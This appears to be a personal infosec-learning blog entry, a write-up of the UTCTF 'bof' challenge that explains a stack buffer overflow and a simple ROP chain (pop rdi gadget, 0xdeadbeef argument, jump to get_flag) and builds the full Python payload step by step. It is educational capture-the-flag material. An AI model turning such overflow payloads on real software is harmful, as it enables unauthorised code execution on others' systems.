<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 58</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz0r_ankeGCGeaAZfOas7LY2CYqoUBKs_Zdq7Ku0clX38');

		.lst-kix_fi2xbrv6fzbg-6>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-6
		}

		ol.lst-kix_fi2xbrv6fzbg-2.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-2 0
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-3, decimal) ". "
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-2>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-2, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-6>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-6, decimal) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_fi2xbrv6fzbg-5>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-5, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-4, lower-latin) ". "
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-4>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-4
		}

		.lst-kix_fi2xbrv6fzbg-7>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-7
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-7>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-7, lower-latin) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-8>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-8, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-0.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-0 0
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-3
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-4.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-4 0
		}

		.lst-kix_fi2xbrv6fzbg-1>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-1, lower-latin) ". "
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_fi2xbrv6fzbg-0>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-5.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-5 0
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-0>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-0
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-2 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-0 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-8 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-6 0
		}

		ol.lst-kix_fi2xbrv6fzbg-3.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-3 0
		}

		.lst-kix_fi2xbrv6fzbg-1>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-1
		}

		ol.lst-kix_fi2xbrv6fzbg-7.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-7 0
		}

		ol.lst-kix_fi2xbrv6fzbg-1.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-1 0
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-2>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-2
		}

		.lst-kix_fi2xbrv6fzbg-5>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-5
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-8>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-8
		}

		ol.lst-kix_fi2xbrv6fzbg-8.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-8 0
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c4 {
			color: #000000;
			font-weight: 300;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c3 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c13 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 14pt
		}

		.c12 {
			color: #000000;
			font-weight: 700;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c8 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c1 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c15 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c10 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c9 {
			color: #434343;
			text-decoration: none;
			vertical-align: baseline;
			font-style: normal
		}

		.c0 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c5 {
			font-size: 14pt;
			font-family: "Montserrat";
			font-weight: 400
		}

		.c7 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto;
		}

		.c16 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c6 {
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-weight: 300
		}

		.c14 {
			text-indent: 36pt
		}

		.c2 {
			height: 11pt
		}

		.c11 {
			margin-left: 36pt
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c7">
	<h3 class="c10" id="h.3zvpwyx0el37"><span class="c0">58<br></span><span
			class="c0">/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c15" id="h.uhn6dzi5itr4"><span class="c16">UTCTF &mdash; &nbsp;bof</span></h3>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">Did my first ROP binary exploit. ROP stands for Return Oriented Programming. As I
			understand, the goal is to create your own program flow in an already compiled program binary by leveraging
			the existing instructions and overflowing the return addresses.</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">The main function decompiler view in Ghidra</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 752.96px; height: 501.50px;"><img
				alt="" src="images/image3day58.png"
				style="width: 891.56px; height: 501.50px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c3">The gets function means we can overflow the buffer and write to the stack&rsquo;s
			return address to execute whatever instruction in the program that we want</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">Exploring the list of functions in this program, I see there&rsquo;s a get_flag
			function. Its decompiler view in Ghidra looks like this :</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 719.50px; height: 515.40px;"><img
				alt="" src="images/image6day58.png"
				style="width: 916.26px; height: 515.40px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">So first I tried to overflow the stack of the main( ) and write the address of the
			first instruction of the get_flag( ) ie. 0x004005ea</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c5">The main function creates a buffer of 0x70 </span><span class="c4">(SUB RSP,
			0x70)</span></p>
	<p class="c1"><span class="c3">After the buffer, there is 8 bytes of the old RBP</span></p>
	<p class="c1"><span class="c3">Then the next 8 bytes are the return address</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">So my psuedo payload would look like this :</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c4">A*0x70 + A*0x8 + little_endian_format(0x004005ea)</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">To convert address to little endian, open python</span></p>
	<p class="c1"><span class="c4">&gt;&gt;&gt;&gt; from pwn import *</span></p>
	<p class="c1"><span class="c4">&gt;&gt;&gt;&gt; p64(0x004005ea)</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">Payload :</span></p>
	<p class="c1"><span class="c4">python -c &ldquo;print &lsquo;A&rsquo;*0x78 +
			&#39;\xea\x05@\x00\x00\x00\x00\x00&rsquo;&rdquo;</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">But that just crashed the program. Of course, because the get_flag( ) function needs
			a param for it run correctly</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">The disassembly of get_flag( ) shows a CMP instruction which tells us what that param
			needs to be</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">CMP dword ptr [RBP + local_1C], oxdeadbeef</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">The first parameter to any function in the 64 bit architecture is stored in RDI
			register as per the calling convention so if I need the get_flag( ) function to run correctly, I need to
			first store the param value in RDI first</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c5">The way to do that is through finding a </span><span class="c6">POP RDI</span><span
			class="c5">&nbsp;instruction (followed by the </span><span class="c6">RET</span><span
			class="c3">&nbsp;instruction) in the program somewhere and writing the address of that instruction in the
			return address on main( ) &lsquo;s stack</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">To find the required instruction, I used a tool called ROPgadget</span></p>
	<p class="c1"><span class="c3">Running ROPgadget on the binary I get a list of all unique instructions</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c4">ropgadget --binary pwnable</span></p>
	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 699.50px; height: 857.83px;"><img
				alt="" src="images/image7day58.png"
				style="width: 1526.18px; height: 857.83px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c3">Writing this to a file I can search for the instruction that I&rsquo;m looking for
			using vim / or using grep</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">ropgadget --binary pwnable &gt; rop_gadget</span></p>
	<p class="c1"><span class="c4">less rop_gadget | grep &ldquo;pop rdi&rdquo;</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 733.00px; height: 93.00px;"><img
				alt="" src="images/image2day58.png"
				style="width: 1585.02px; height: 900.39px; margin-left: 0.00px; margin-top: -771.39px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">So the payload now changes to the following :</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c4">python -c &ldquo;print &lsquo;A&rsquo;*0x78 +
			&#39;\x93\x06@\x00\x00\x00\x00\x00&#39;</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c5">This would take the instruction pointer to the </span><span class="c6">POP
			RDI</span><span class="c3">&nbsp;instruction and execute it. Executing the instruction would mean that
			whatever value RSP is pointing at would be &lsquo;popped&rsquo; from the stack and saved into RDI. Where is
			the RSP at this point?</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">Main&rsquo;s stack</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">-------- &larr; Where RSP was moved to on SUB RSP, 0x70</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">&nbsp;0x70</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">________</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">Old RBP</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">-------- &larr; RBP</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">Ret addr &larr; RSP before jumping to POP RDI</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">________ </span></p>
	<p class="c1"><span
			class="c4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>
	</p>
	<p class="c1 c14"><span class="c4">a &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&larr; RSP when executing the
			POP RDI (RBP + 0x10)</span></p>
	<p class="c1"><span class="c4">________ </span></p>
	<p class="c1"><span
			class="c4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>
	</p>
	<p class="c1 c11"><span class="c4">b&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&larr; RBP + 0x18</span></p>
	<p class="c1"><span class="c4">________</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">So that means RBP + 0x10 (space marked by &lsquo;a&rsquo; on the stack) should be the
			value that needs to be saved in to RDI ie. 0x deadbeef (needs to be first converted to little endian format
			though)</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">&nbsp;</span></p>
	<p class="c1"><span class="c3">So the payload now changes to the following :</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c4">python -c &ldquo;print &lsquo;A&rsquo;*0x78 + &#39;\x93\x06@\x00\x00\x00\x00\x00&#39;
			+ &#39;\xef\xbe\xad\xde\x00\x00\x00\x00&#39;</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c4">gdb output can confirm that RDI = 0xdeadbeef</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 719.50px; height: 765.29px;"><img
				alt="" src="images/image5day58.png"
				style="width: 1360.51px; height: 765.29px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1"><span class="c3">When the next instruction ie RET is run after POP RDI, the instruction will return to
			RBP + 0x18 (space marked by &lsquo;b&rsquo; on the stack). &nbsp;Now that RDI has been set to the desired
			value, we should call the get_flag( ) function. So the space marked by &lsquo;b&rsquo; on the stack should
			contain the return address of the get_flag( ) function</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">So (finally) the payload now becomes :</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c4">python -c &ldquo;print &lsquo;A&rsquo;*0x78 + &#39;\x93\x06@\x00\x00\x00\x00\x00&#39;
			+ &#39;\xef\xbe\xad\xde\x00\x00\x00\x00&#39; + &#39;\xea\x05@\x00\x00\x00\x00\x00&#39; +
			&lsquo;\n&rsquo;</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">Lets send this payload to the challenge using the following script which should give
			us a shell to cat the flag.txt file</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 745.99px; height: 394.50px;"><img
				alt="" src="images/image4day58.png"
				style="width: 1289.46px; height: 724.97px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c3">And boom! We have a shell!</span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
